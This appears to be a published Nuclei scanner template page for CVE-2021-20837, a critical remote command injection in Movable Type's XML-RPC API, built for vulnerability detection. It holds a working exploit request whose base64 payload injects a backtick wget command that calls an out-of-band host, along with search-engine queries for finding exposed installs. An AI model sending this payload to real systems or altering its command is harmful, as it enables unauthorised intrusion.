MovableType - Remote Command Injection

ID: CVE-2021-20837

Severity: critical

Author: dhiyaneshDK,hackergautam

Tags: cve2021,cve,packetstorm,rce,movable,sixapart

Description

MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.

YAML Source

id: CVE-2021-20837

info:
  name: MovableType - Remote Command Injection
  author: dhiyaneshDK,hackergautam
  severity: critical
  description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability in MovableType.
  reference:
    - https://nemesis.sh/posts/movable-type-0day/
    - https://github.com/ghost-nemesis/cve-2021-20837-poc
    - https://twitter.com/cyber_advising/status/1454051725904580608
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20837
    - http://packetstormsecurity.com/files/164818/Movable-Type-7-r.5002-XMLRPC-API-Remote-Command-Injection.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-20837
    cwe-id: CWE-78
    epss-score: 0.96998
    epss-percentile: 0.99738
    cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:premium:*:*:*
  metadata:
    max-request: 1
    vendor: sixapart
    product: movable_type
    shodan-query:
      - http.title:"サインイン | movable type pro"
      - cpe:"cpe:2.3:a:sixapart:movable_type"
    fofa-query: title="サインイン | movable type pro"
    google-query: intitle:"サインイン | movable type pro"
  tags: cve2021,cve,packetstorm,rce,movable,sixapart

http:
  - raw:
      - |
        POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version="1.0" encoding="UTF-8"?>
        <methodCall>
          <methodName>mt.handler_to_coderef</methodName>
          <params>
            <param>
              <value>
                <base64>
                  {{base64("`wget http://{{interactsh-url}}`")}}
                </base64>
              </value>
            </param>
          </params>
        </methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        words:
          - "failed loading package"

      - type: status
        status:
          - 200
# digest: 490a0046304402206b4d67ccc7856a13631479e0517c158cdfa5962ead6b66ff4cd55158c3b78b420220151850f5746eec36d2f2e2b39adf5f13167ab1a42e4b52b5e5f3dd7383df2d36:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-20837.yaml"

View on Github